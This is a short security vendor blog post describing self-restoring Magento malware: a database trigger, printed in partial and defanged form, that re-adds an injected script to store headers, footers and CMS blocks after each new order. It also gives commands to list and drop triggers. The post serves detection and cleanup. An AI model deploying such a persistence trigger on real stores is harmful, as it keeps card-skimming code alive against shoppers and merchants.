Get started in 5 minutes!

Self-healing malware restores itself after deletion


Regular Javascript-based malware is normally injected in the static header or footer HTML definitions in the database. Cleaning these records used to be sufficient to get rid of the malware. But not anymore: this week a new malware pattern surfaced. Once deleted, it uses a clever database trigger to restore itself.

The pattern was discovered by Jeroen Boersma (excellent detective job!). He found the following database trigger (edited for readability):

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src=""></script>%', 
		CONCAT(value, ' <script src=""></script>')
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';\

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src=""></script>%', 
		CONCAT(content, ' <script src=""></script>')

The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.

This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.

Check your own database

Do you have persistent malware hidden in your database?

echo 'SHOW TRIGGERS' | n98-magerun db:console

NB. Magento Enterprise and some community extensions contain legitimate triggers. So if you find triggers, look for suspicious SQL code, such as anything containing admin, .js, script or < (html tags).

If you find a malicious trigger, you can delete it like this:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

Attack context

For future reference: the entry vector for this malware was a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

New signatures

Our Malware Scanner has been updated with the new patterns.

Prevent Magecart attacks,
protect your web store
with Sansec's eComscan

Since our discovery of MageCart attacks in 2015, we've investigated thousands of hacked Magento web stores. All our research findings are added to our automated malware and vulnerability scanner for Magento and Adobe Commerce.
Merchants using eComscan are protected against the latest malware attacks and all known backdoors. eComscan provides an hourly vulnerability audit on all Magento versions, configurations, and extensions.

Try our malware scanner